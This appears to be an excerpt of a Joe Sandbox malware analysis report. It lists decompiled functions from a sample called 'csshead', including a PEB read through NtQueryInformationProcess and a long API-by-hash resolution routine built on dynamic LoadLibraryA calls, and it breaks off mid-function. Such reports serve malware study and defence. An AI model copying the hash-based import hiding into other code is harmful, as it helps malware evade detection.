    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00404E94(void* __eax) {
    				void* _v8;
    				intOrPtr _v12;
    				long _v16;
    				long _v20;
    				void* _v24;
    				void _v28;
    				intOrPtr _v48;
    				void _v52;
    
    				_v8 = __eax;
    				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18,  &_v20);
    				if(_v16 == 0 && _v48 != 0) {
    					_v24 = _v48 + 8;
    					ReadProcessMemory(_v8, _v24,  &_v28, 4,  &_v20); // executed
    					_v12 = _v28;
    				}
    				return _v12;
    			}
    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00404EAD
    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 00404EDD
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_0001CA06), ref: 0042CA4D
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E0042CA48() {
    
    				SetUnhandledExceptionFilter(0x42ca06); // executed
    				return 0;
    			}
    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_0002CA06), ref: 0042CA4D
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00402574(intOrPtr __eax) {
    				intOrPtr _v8;
    				struct HINSTANCE__* _v12;
    				CHAR* _t492;
    				CHAR* _t500;
    				struct HINSTANCE__* _t564;
    				CHAR* _t567;
    				struct HINSTANCE__* _t568;
    				CHAR* _t571;
    				CHAR* _t587;
    				CHAR* _t669;
    				CHAR* _t677;
    				CHAR* _t685;
    				CHAR* _t693;
    				CHAR* _t699;
    				struct HINSTANCE__* _t700;
    				CHAR* _t707;
    				struct HINSTANCE__* _t708;
    				intOrPtr _t712;
    				CHAR* _t713;
    				CHAR* _t755;
    
    				_v8 = __eax;
    				_v12 = E004024F8();
    				 *0x40b11c = E00401994(_v12, 0xc8ac8026);
    				 *0x40b120 = E00401994(_v12, 0x4b935b8e);
    				 *0x40b1d0 = E00401994(_v12, 0x78b00c7e);
    				 *0x40b144 = E00401994(_v12, 0x25447ac6);
    				 *0x40b148 = E00401994(_v12, 0xf50b872);
    				 *0x40b160 = E00401994(_v12, 0x9e6fa842);
    				 *0x40b1bc = E00401994(_v12, 0x7d544dbd);
    				 *0x40b124 = E00401994(_v12, 0x1fc0eaee);
    				 *0x40b384 = E00401994(_v12, 0x270118e2);
    				 *0x40b498 = E00401994(_v12, 0x4ae7572b);
    				 *0x40b138 = E00401994(_v12, 0x81f0f0c9);
    				 *0x40b140 = E00401994(_v12, 0x95fb6a02);
    				 *0x40b334 = E00401994(_v12, 0x70f6fe31);
    				 *0x40b338 = E00401994(_v12, 0x399354ce);
    				 *0x40b128 = E00401994(_v12, 0xa45b370a);
    				 *0x40b208 = E00401994(_v12, 0x2b00b870);
    				 *0x40b1c4 = E00401994(_v12, 0x4fba916c);
    				 *0x40b2a4 = E00401994(_v12, 0xc54374f3);
    				 *0x40b2a0 = E00401994(_v12, 0x9c700049);
    				 *0x40b29c = E00401994(_v12, 0x4f6ca717);
    				 *0x40b2d8 = E00401994(_v12, 0x67ecde97);
    				 *0x40b2dc = E00401994(_v12, 0xfdc94385);
    				 *0x40b2e0 = E00401994(_v12, 0x68807354);
    				 *0x40b2e4 = E00401994(_v12, 0x84d25ea);
    				 *0x40b2e8 = E00401994(_v12, 0xfc7a6efd);
    				 *0x40b2ec = E00401994(_v12, 0x5550b067);
    				 *0x40b2f0 = E00401994(_v12, 0xaebea6a);
    				 *0x40b12c = E00401994(_v12, 0x46318ac7);
    				 *0x40b130 = E00401994(_v12, 0x49a1374a);
    				 *0x40b134 = E00401994(_v12, 0xae17c571);
    				 *0x40b150 = E00401994(_v12, 0xe61874b3);
    				 *0x40b154 = E00401994(_v12, 0x3a7a7478);
    				 *0x40b158 = E00401994(_v12, 0x533d3b41);
    				 *0x40b15c = E00401994(_v12, 0x99a4299d);
    				 *0x40b164 = E00401994(_v12, 0xbea0bf35);
    				 *0x40b168 = E00401994(_v12, 0x9d00a761);
    				 *0x40b188 = E00401994(_v12, 0x9abfb8a6);
    				 *0x40b194 = E00401994(_v12, 0x6b416786);
    				 *0x40b198 = E00401994(_v12, 0x774393e8);
    				 *0x40b19c = E00401994(_v12, 0x2ee4f10d);
    				 *0x40b1a0 = E00401994(_v12, 0x19f78c90);
    				 *0x40b1a4 = E00401994(_v12, 0xd89ad05);
    				 *0x40b1a8 = E00401994(_v12, 0xc930ea1e);
    				 *0x40b18c = E00401994(_v12, 0x5bc1d14f);
    				 *0x40b1e0 = E00401994(_v12, 0x77cd9567);
    				 *0x40b1f0 = E00401994(_v12, 0x32432444);
    				 *0x40b1f4 = E00401994(_v12, 0x279dead7);
    				 *0x40b1f8 = E00401994(_v12, 0x7b4842c1);
    				 *0x40b1fc = E00401994(_v12, 0xae52c609);
    				 *0x40b200 = E00401994(_v12, 0xbf78969c);
    				 *0x40b204 = E00401994(_v12, 0xbb74a4a2);
    				 *0x40b22c = E00401994(_v12, 0x464871f3);
    				 *0x40b190 = E00401994(_v12, 0x9bd6888f);
    				 *0x40b20c = E00401994(_v12, 0x5c17ec75);
    				 *0x40b210 = E00401994(_v12, 0x58fe7abe);
    				 *0x40b254 = E00401994(_v12, 0x768aa260);
    				 *0x40b25c = E00401994(_v12, 0xef0a25b7);
    				 *0x40b260 = E00401994(_v12, 0xbc262395);
    				 *0x40b264 = E00401994(_v12, 0xe8bf6dad);
    				 *0x40b268 = E00401994(_v12, 0x5cd9430);
    				 *0x40b26c = E00401994(_v12, 0xaef7cbf1);
    				 *0x40b274 = E00401994(_v12, 0x475587b7);
    				 *0x40b278 = E00401994(_v12, 0x3def91ba);
    				 *0x40b408 = E00401994(_v12, 0xda81bc58);
    				 *0x40b40c = E00401994(_v12, 0xf3b84f05);
    				 *0x40b410 = E00401994(_v12, 0x392b6027);
    				 *0x40b414 = E00401994(_v12, 0x7b2d2505);
    				 *0x40b314 = E00401994(_v12, 0xeeba5eba);
    				 *0x40b2a8 = E00401994(_v12, 0x89b968d2);
    				 *0x40b2c0 = E00401994(_v12, 0x7e92ca65);
    				 *0x40b2f4 = E00401994(_v12, 0x4c1077d6);
    				 *0x40b31c = E00401994(_v12, 0x84033deb);
    				 *0x40b320 = E00401994(_v12, 0x725cb0a1);
    				 *0x40b250 = E00401994(_v12, 0x52ac19c);
    				 *0x40b318 = E00401994(_v12, 0x23ebe98b);
    				 *0x40b464 = E00401994(_v12, 0x3b3ee0f9);
    				 *0x40b468 = E00401994(_v12, 0x8d5a50dc);
    				 *0x40b46c = E00401994(_v12, 0x8d5a50ca);
    				 *0x40b470 = E00401994(_v12, 0x5e7ee0d0);
    				 *0x40b474 = E00401994(_v12, 0x69260152);
    				 *0x40b478 = E00401994(_v12, 0x9c480e24);
    				 *0x40b47c = E00401994(_v12, 0x5aa7e70b);
    				 *0x40b488 = E00401994(_v12, 0xe74f57ee);
    				 *0x40b48c = E00401994(_v12, 0x2d40b8f0);
    				 *0x40b490 = E00401994(_v12, 0xae17c071);
    				 *0x40b494 = E00401994(_v12, 0x515be757);
    				 *0x40b49c = E00401994(_v12, 0x1297812c);
    				 *0x40b4a0 = E00401994(_v12, 0x2f2feeda);
    				 *0x40b4a4 = E00401994(_v12, 0x81f0f0df);
    				 *0x40b4a8 = E00401994(_v12, 0xf3fd1c3);
    				 *0x40b4ac = E00401994(_v12, 0xef48e03a);
    				 *0x40b4b0 = E00401994(_v12, 0xfb0730c);
    				 *0x40b4b4 = E00401994(_v12, 0xa9de6f5a);
    				 *0x40b4b8 = E00401994(_v12, 0x723eb0d5);
    				 *0x40b4bc = E00401994(_v12, 0x487fe16b);
    				 *0x40b4c0 = E00401994(_v12, 0x8f8f114);
    				 *0x40b4c4 = E00401994(_v12, 0x3d9972f5);
    				 *0x40b4c8 = E00401994(_v12, 0x6fb89af0);
    				 *0x40b4cc = E00401994(_v12, 0xc09d5d66);
    				 *0x40b4d0 = E00401994(_v12, 0x2ca2b7e6);
    				 *0x40b4d4 = E00401994(_v12, 0x7b88bf3b);
    				 *0x40b4d8 = E00401994(_v12, 0xaa1de02f);
    				 *0x40b4dc = E00401994(_v12, 0xa48d6762);
    				 *0x40b4e0 = E00401994(_v12, 0x3a35705f);
    				 *0x40b4e8 = E00401994(_v12, 0x697a6afe);
    				 *0x40b4ec = E00401994(_v12, 0x95902b19);
    				 *0x40b4f0 = E00401994(_v12, 0x1295012c);
    				 *0x40b4f4 = E00401994(_v12, 0x2891ae7a);
    				 *0x40b4f8 = E00401994(_v12, 0x831a3927);
    				 *0x40b23c = E00401994(_v12, 0xd0498cd4);
    				 *0x40c22c = E00401994(_v12, 0xd0498cc2);
    				_t492 =  *0x40a084; // 0x401bf0
    				_v12 = LoadLibraryA(_t492);
    				 *0x40b230 = E00401994(_v12, 0xa638ce5f);
    				 *0x40b234 = E00401994(_v12, 0xbc44a131);
    				 *0x40b238 = E00401994(_v12, 0xf6edf382);
    				_t500 =  *0x40a080; // 0x401be8
    				_v12 = LoadLibraryA(_t500);
    				 *0x40b2fc = E00401994(_v12, 0x1ab922bf);
    				 *0x40b2f8 = E00401994(_v12, 0xa8afd1f3);
    				 *0x40b300 = E00401994(_v12, 0xc6ce9b8a);
    				 *0x40b304 = E00401994(_v12, 0xf26817eb);
    				 *0x40b308 = E00401994(_v12, 0x7506e960);
    				 *0x40b30c = E00401994(_v12, 0xbf7efb5a);
    				 *0x40b310 = E00401994(_v12, 0x4baed1c8);
    				 *0x40b484 = E00401994(_v12, 0x7396104b);
    				 *0x40b480 = E00401994(_v12, 0xb800c8a6);
    				 *0x40b388 = E00401994(_v12, 0x8616ab9b);
    				 *0x40b38c = E00401994(_v12, 0xb4584dda);
    				 *0x40b1b4 = E00401994(_v12, 0x6c7f716f);
    				 *0x40b1b0 = E00401994(_v12, 0x252b53b);
    				 *0x40b2ac = E00401994(_v12, 0xd36ceaf0);
    				 *0x40b2b0 = E00401994(_v12, 0xd7a87c3a);
    				 *0x40b2b4 = E00401994(_v12, 0xc45d9631);
    				 *0x40b2b8 = E00401994(_v12, 0x4baed1de);
    				 *0x40b2bc = E00401994(_v12, 0x8ebef5b1);
    				 *0x40b270 = E00401994(_v12, 0xea3af0d7);
    				 *0x40b418 = E00401994(_v12, 0x484007c);
    				 *0x40b41c = E00401994(_v12, 0x58a81c29);
    				 *0x40b420 = E00401994(_v12, 0xcacd450);
    				 *0x40b424 = E00401994(_v12, 0xabbc680d);
    				 *0x40b42c = E00401994(_v12, 0x7cbd2247);
    				 *0x40b428 = E00401994(_v12, 0xbdb70517);
    				 *0x40b430 = E00401994(_v12, 0x1d6c998b);
    				 *0x40b434 = E00401994(_v12, 0xa2f65ba2);
    				 *0x40b438 = E00401994(_v12, 0xad4ffcd5);
    				 *0x40b43c = E00401994(_v12, 0xc8a274ac);
    				 *0x40b440 = E00401994(_v12, 0x5fda1871);
    				 *0x40b444 = E00401994(_v12, 0xc0d4187d);
    				_t564 = LoadLibraryA("Psapi"); // executed
    				_v12 = _t564;
    				 *0x40b4e4 = E00401994(_v12, 0x860331a8);
    				_t567 =  *0x40a0a4; // 0x401c40
    				_t568 = LoadLibraryA(_t567); // executed
    				_v12 = _t568;
    				 *0x40b178 = E00401994(_v12, 0xa60c5f05);
    				_t571 =  *0x40a0d0; // 0x401cac
    				_v12 = LoadLibraryA(_t571);
    				 *0x40b3ec = E00401994(_v12, 0x5af0017c);
    				 *0x40b3f0 = E00401994(_v12, 0x5e10f525);
    				 *0x40b3f4 = E00401994(_v12, 0x48b87efc);
    				 *0x40b3f8 = E00401994(_v12, 0xdf91a857);
    				 *0x40b3fc = E00401994(_v12, 0x9e90b462);
    				 *0x40b400 = E00401994(_v12, 0x4894dafc);
    				 *0x40b404 = E00401994(_v12, 0x59012669);
    				_t587 =  *0x40a0e0; // 0x401d08
    				_v12 = LoadLibraryA(_t587);
    				 *0x40b330 = E00401994(_v12, 0xb9d41c2f);
    				 *0x40b1b8 = E00401994(_v12, 0xb96ca1c0);
    				 *0x40b1c0 = E00401994(_v12, 0x28e9e291);
    				 *0x40b1c8 = E00401994(_v12, 0x1d1f334a);
    				 *0x40b1cc = E00401994(_v12, 0x5cb5ef72);
    				 *0x40b2c8 = E00401994(_v12, 0xce303c3a);
    				 *0x40b2c4 = E00401994(_v12, 0x3e68cfc6);
    				 *0x40b2cc = E00401994(_v12, 0xd4ecc759);
    				 *0x40b2d0 = E00401994(_v12, 0xd21e3d01);
    				 *0x40b2d4 = E00401994(_v12, 0xad0c9f7e);
    				 *0x40b4fc = E00401994(_v12, 0x8ad7de34);
    				 *0x40b500 = E00401994(_v12, 0x78660dbe);
    				 *0x40b504 = E00401994(_v12, 0xcebf13be);
    				 *0x40b508 = E00401994(_v12, 0xd4b3d42);
    				 *0x40b50c = E00401994(_v12, 0x72760bb8);
    				 *0x40b448 = E00401994(_v12, 0x3c4de260);
    				 *0x40b44c = E00401994(_v12, 0xf837a387);
    				 *0x40b450 = E00401994(_v12, 0xc3f46335);
    				 *0x40b454 = E00401994(_v12, 0xa5ffa46e);
    				 *0x40b458 = E00401994(_v12, 0x453db143);
    				 *0x40b45c = E00401994(_v12, 0x37a53419);
    				 *0x40b460 = E00401994(_v12, 0xcebf17e6);
    				 *0x40b17c = E00401994(_v12, 0xaad67ff8);
    				 *0x40b180 = E00401994(_v12, 0x3ef2d3dd);
    				 *0x40b184 = E00401994(_v12, 0x90a097e6);
    				 *0x40b16c = E00401994(_v12, 0x7a2167dc);
    				 *0x40b170 = E00401994(_v12, 0x1b3d12b9);
    				 *0x40b174 = E00401994(_v12, 0x80dbbe07);
    				 *0x40b1ac = E00401994(_v12, 0x398c5285);
    				 *0x40b1dc = E00401994(_v12, 0x560c7c4a);
    				 *0x40b1d8 = E00401994(_v12, 0xdb355534);
    				 *0x40b1d4 = E00401994(_v12, 0x3e400fd6);
    				 *0x40b1e4 = E00401994(_v12, 0xee6ab5d);
    				 *0x40b1e8 = E00401994(_v12, 0x1802e7c8);
    				 *0x40b1ec = E00401994(_v12, 0xf65a7d95);
    				 *0x40b224 = E00401994(_v12, 0xb8538a52);
    				 *0x40b228 = E00401994(_v12, 0xccd03c3a);
    				 *0x40b328 = E00401994(_v12, 0x6d523bdd);
    				 *0x40b32c = E00401994(_v12, 0xf2f9de08);
    				 *0x40b324 = E00401994(_v12, 0xce30283a);
    				_t669 =  *0x40a094; // 0x401c20
    				_v12 = LoadLibraryA(_t669);
    				 *0x40b214 = E00401994(_v12, 0x3caa9945);
    				 *0x40b218 = E00401994(_v12, 0x5a56b493);
    				 *0x40b258 = E00401994(_v12, 0x7dfb3ef0);
    				_t677 =  *0x40a088; // 0x401bf8
    				_v12 = LoadLibraryA(_t677);
    				 *0x40b14c = E00401994(_v12, 0xf2276995);
    				 *0x40b21c = E00401994(_v12, 0xc95d8550);
    				 *0x40b220 = E00401994(_v12, 0x570bc899);
    				_t685 =  *0x40a098; // 0x401c28
    				_v12 = LoadLibraryA(_t685);
    				 *0x40b27c = E00401994(_v12, 0x368435be);
    				 *0x40b280 = E00401994(_v12, 0xf341d5cf);
    				 *0x40b284 = E00401994(_v12, 0xedb3159d);
    				_t693 =  *0x40a1b8; // 0x401eec
    				_v12 = LoadLibraryA(_t693);
    				 *0x40b288 = E00401994(_v12, 0x3184919f);
    				 *0x40b28c = E00401994(_v12, 0x39aedd1b);
    				_t699 =  *0x40a0a0; // 0x401c38
    				_t700 = LoadLibraryA(_t699); // executed
    				_v12 = _t700;
    				 *0x40b290 = E00401994(_v12, 0x8a94f707);
    				 *0x40b294 = E00401994(_v12, 0x7aa45c7a);
    				 *0x40b298 = E00401994(_v12, 0x4e26c00f);
    				_t707 =  *0x40a0cc; // 0x401ca4
    				_t708 = LoadLibraryA(_t707); // executed
    				_v12 = _t708;
    				 *0x40b33c = E00401994(_v12, 0x233e6d0f);
    				_t712 = E00401994(_v12, 0xbf821ad);
    				 *0x40b340 = _t712;
    				if(_v8 != 0) {
    					_t713 =  *0x40a1b0; // 0x401edc
    					_v12 = LoadLibraryA(_t713);
    					 *0x40b34c = E00401994(_v12, 0xd939f838);
    					 *0x40b344 = E00401994(_v12, 0x9400a044);
    					 *0x40b348 = E00401994(_v12, 0xee9bf475);
    					 *0x40b3a4 = E00401994(_v12, 0xe797764);
    					 *0x40b3a8 = E00401994(_v12, 0xedd8fe8a);
    					 *0x40b3ac = E00401994(_v12, 0xe5971f6);
    					 *0x40b3b0 = E00401994(_v12, 0x5d99726a);
    					 *0x40b3b4 = E00401994(_v12, 0x1f935b1d);
    					 *0x40b3b8 = E00401994(_v12, 0xfc7af16a);
    					 *0x40b3bc = E00401994(_v12, 0x939d7d9c);
    					 *0x40b3c0 = E00401994(_v12, 0xcdde757d);
    					 *0x40b3c4 = E00401994(_v12, 0xc5a7764);
    					 *0x40b3c8 = E00401994(_v12, 0x9e7d3188);
    					 *0x40b3cc = E00401994(_v12, 0x3c797b7a);
    					 *0x40b3d0 = E00401994(_v12, 0x4dfc1f3b);
    					 *0x40b3d4 = E00401994(_v12, 0x8e9bf775);
    					 *0x40b3d8 = E00401994(_v12, 0x8fb8b5bd);
    					 *0x40b3dc = E00401994(_v12, 0xb909d088);
    					 *0x40b3e0 = E00401994(_v12, 0xf44318c6);
    					 *0x40b3e4 = E00401994(_v12, 0x95e4a5d7);
    					_t755 =  *0x40a1b4; // 0x401ee4
    					_v12 = LoadLibraryA(_t755);
    					 *0x40b13c = E00401994(_v12, 0xaa91290b);
    					 *0x40b350 = E00401994(_v12, 0x8593dd7);
    					 *0x40b354 = E00401994(_v12, 0x6ae49924);
    					 *0x40b358 = E00401994(_v12, 0x7314fb0c);
    					 *0x40b35c = E00401994(_v12, 0xb87dbd66);
    					 *0x40b360 = E00401994(_v12, 0x2f5ce027);
    					 *0x40b364 = E00401994(_v12, 0xa3a80ab6);
    					 *0x40b368 = E00401994(_v12, 0xddcb15d);
    					 *0x40b36c = E00401994(_v12, 0x8733d614);
    					 *0x40b370 = E00401994(_v12, 0xfde87743);
    					 *0x40b390 = E00401994(_v12, 0x1a212962);
    					 *0x40b394 = E00401994(_v12, 0x9f13856a);
    					 *0x40b398 = E00401994(_v12, 0xbe618d3e);
    					 *0x40b39c = E00401994(_v12, 0x1510002f);
    					 *0x40b3a0 = E00401994(_v12, 0x7edec584);
    					 *0x40b380 = E00401994(_v12, 0xaa912901);
    					 *0x40b374 = E00401994(_v12, 0x2ae71934);
    					 *0x40b378 = E00401994(_v12, 0x1ad09c78);
    					 *0x40b37c = E00401994(_v12, 0x9ef6461);
    					_t712 = E00401994(_v12, 0x57fbc0dd);
    					 *0x40b3e8 = _t712;
    				}
    				return _t712;
    			}
    APIs
    • LoadLibraryA.KERNEL32(00401BF0), ref: 00402D59
    • LoadLibraryA.KERNEL32(00401BE8), ref: 00402D9E
    • LoadLibraryA.KERNELBASE(Psapi), ref: 00402FDA
    • LoadLibraryA.KERNELBASE(00401C40), ref: 00402FFB
    • LoadLibraryA.KERNEL32(00401CAC), ref: 0040301C
    • LoadLibraryA.KERNEL32(00401D08), ref: 004030A9
    • LoadLibraryA.KERNEL32(00401C20), ref: 00403388
    • LoadLibraryA.KERNEL32(00401BF8), ref: 004033CD
    • LoadLibraryA.KERNEL32(00401C28), ref: 00403412
    • LoadLibraryA.KERNEL32(00401EEC), ref: 00403457
    • LoadLibraryA.KERNELBASE(00401C38), ref: 0040348A
    • LoadLibraryA.KERNELBASE(00401CA4), ref: 004034CF
    • LoadLibraryA.KERNEL32(00401EDC), ref: 0040350C
    • LoadLibraryA.KERNEL32(00401EE4), ref: 00403683
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 51%
    			E004260A2(void* __ebx, void* __fp0) {
    				void* __edi;
    				void* __esi;
    				_Unknown_base(*)()* _t7;
    				long _t10;
    				void* _t11;
    				int _t12;
    				void* _t14;
    				void* _t15;
    				void* _t16;
    				_Unknown_base(*)()* _t17;
    				void* _t18;
    				intOrPtr* _t20;
    				intOrPtr _t21;
    				intOrPtr* _t23;
    				long _t26;
    				void* _t30;
    				struct HINSTANCE__* _t35;
    				intOrPtr* _t36;
    				void* _t39;
    				intOrPtr* _t41;
    				void* _t42;
    				void* _t45;
    
    				_t45 = __fp0;
    				_t30 = __ebx;
    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
    				if(_t35 != 0) {
    					 *0x442c68 = GetProcAddress(_t35, "FlsAlloc");
    					 *0x442c6c = GetProcAddress(_t35, "FlsGetValue");
    					 *0x442c70 = GetProcAddress(_t35, "FlsSetValue");
    					_t7 = GetProcAddress(_t35, "FlsFree");
    					__eflags =  *0x442c68;
    					_t39 =  *0x433168;
    					 *0x442c74 = _t7;
    					if( *0x442c68 == 0) {
    						L6:
    						 *0x442c6c =  *0x43316c;
    						 *0x442c68 = 0x425d07;
    						 *0x442c70 = _t39;
    						 *0x442c74 =  *0x433164;
    					} else {
    						__eflags =  *0x442c6c;
    						if( *0x442c6c == 0) {
    							goto L6;
    						} else {
    							__eflags =  *0x442c70;
    							if( *0x442c70 == 0) {
    								goto L6;
    							} else {
    								__eflags = _t7;
    								if(_t7 == 0) {
    									goto L6;
    								}
    							}
    						}
    					}
    					_t10 = TlsAlloc();
    					 *0x442050 = _t10;
    					__eflags = _t10 - 0xffffffff;
    					if(_t10 == 0xffffffff) {
    						L15:
    						_t11 = 0;
    						__eflags = 0;
    					} else {
    						_t12 = TlsSetValue(_t10,  *0x442c6c);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							goto L15;
    						} else {
    							E004243EC();
    							_t41 =  *0x4331b8; // executed
    							_t14 =  *_t41( *0x442c68); // executed
    							 *0x442c68 = _t14; // executed
    							_t15 =  *_t41( *0x442c6c); // executed
    							 *0x442c6c = _t15; // executed
    							_t16 =  *_t41( *0x442c70); // executed
    							 *0x442c70 = _t16; // executed
    							_t17 =  *_t41( *0x442c74); // executed
    							 *0x442c74 = _t17;
    							_t18 = L0042BF11();
    							__eflags = _t18;
    							if(_t18 == 0) {
    								L14:
    								L00425D81();
    								goto L15;
    							} else {
    								_t36 =  *0x4331bc;
    								_t20 =  *_t36( *0x442c68, L00425F05); // executed
    								_t21 =  *_t20();
    								 *0x44204c = _t21;
    								__eflags = _t21 - 0xffffffff;
    								if(_t21 == 0xffffffff) {
    									goto L14;
    								} else {
    									_t42 = E0042A124(1, 0x214);
    									__eflags = _t42;
    									if(_t42 == 0) {
    										goto L14;
    									} else {
    										_t23 =  *_t36( *0x442c70,  *0x44204c, _t42); // executed
    										__eflags =  *_t23();
    										if(__eflags == 0) {
    											goto L14;
    										} else {
    											_push(0);
    											_push(_t42);
    											L00425DBE(_t30, _t36, _t42, __eflags, _t45);
    											_t26 = GetCurrentThreadId();
    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
    											 *_t42 = _t26;
    											_t11 = 1;
    										}
    									}
    								}
    							}
    						}
    					}
    					return _t11;
    				} else {
    					L00425D81();
    					return 0;
    				}
    			}
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00424C8B), ref: 004260AA
    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004260CC
    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004260D9
    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004260E6
    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004260F3
    • TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
    • TlsSetValue.KERNEL32(00000000,?,00424C8B), ref: 0042615E
    • RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426179
    • RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426186
    • RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426193
    • RtlEncodePointer.NTDLL(?,00424C8B), ref: 004261A0
      • Part of subcall function 0042BF11: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0042BF39
    • RtlDecodePointer.NTDLL(Function_00025F05,?,00424C8B), ref: 004261C1
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000,00000001,00000214), ref: 0042A14C
    • RtlDecodePointer.NTDLL(00000000,?,00424C8B), ref: 004261F0
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    • GetCurrentThreadId.KERNEL32 ref: 00426202
      • Part of subcall function 00425D81: DecodePointer.KERNEL32(FFFFFFFF,00426218,?,00424C8B), ref: 00425D92
      • Part of subcall function 00425D81: TlsFree.KERNEL32(FFFFFFFF,00426218,?,00424C8B), ref: 00425DAC
      • Part of subcall function 00425D81: DeleteCriticalSection.KERNEL32(00000000,00000000,0003DE0A,?,00426218,?,00424C8B), ref: 0042BF78
      • Part of subcall function 00425D81: DeleteCriticalSection.KERNEL32(FFFFFFFF,0003DE0A,?,00426218,?,00424C8B), ref: 0042BFA2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 76%
    			E00403360(intOrPtr* __ecx, void* __eflags) {
    				void* __ebp;
    				long _t61;
    				long _t64;
    				long _t70;
    				long _t75;
    				intOrPtr _t79;
    				void* _t85;
    				long _t87;
    				void* _t89;
    				void* _t95;
    				intOrPtr _t98;
    				struct HICON__* _t111;
    				signed int _t112;
    				long _t144;
    				intOrPtr _t146;
    				CHAR* _t154;
    				LONG* _t155;
    				LONG* _t156;
    				LONG* _t157;
    				CHAR* _t158;
    				intOrPtr* _t159;
    				void* _t160;
    				void* _t161;
    				void* _t174;
    				void* _t177;
    				void* _t180;
    
    				_t159 = __ecx;
    				L00403120(_t161 + 0x14,  *((intOrPtr*)(_t161 + 0x24)));
    				_t154 =  *(_t161 + 0x10);
    				if( *((intOrPtr*)(_t154 - 8)) != 0) {
    					L28:
    					_t111 = SetCursor(LoadCursorA(0, 0x7f02));
    					_t61 =  *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x20))))(_t154);
    					__eflags = _t61;
    					if(_t61 != 0) {
    						__eflags =  *(_t161 + 0x38);
    						if( *(_t161 + 0x38) == 0) {
    							SetCursor(_t111);
    							__eflags = _t154 - 0xc -  *0x440020; // 0x440010
    							if(__eflags != 0) {
    								_t155 =  &(_t154[0xfffffffffffffff4]);
    								_t64 = InterlockedDecrement(_t155);
    								__eflags = _t64;
    								if(_t64 <= 0) {
    									_push(_t155);
    									L004221B4();
    								}
    							}
    							return 1;
    						} else {
    							_t160 =  *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x50))))(_t154, 1);
    							SetCursor(_t111);
    							__eflags = _t154 - 0xc -  *0x440020; // 0x440010
    							if(__eflags != 0) {
    								_t156 =  &(_t154[0xfffffffffffffff4]);
    								_t70 = InterlockedDecrement(_t156);
    								__eflags = _t70;
    								if(_t70 <= 0) {
    									_push(_t156);
    									L004221B4();
    								}
    							}
    							return _t160;
    						}
    					} else {
    						__eflags =  *((intOrPtr*)(_t161 + 0x34)) - _t61;
    						if( *((intOrPtr*)(_t161 + 0x34)) == _t61) {
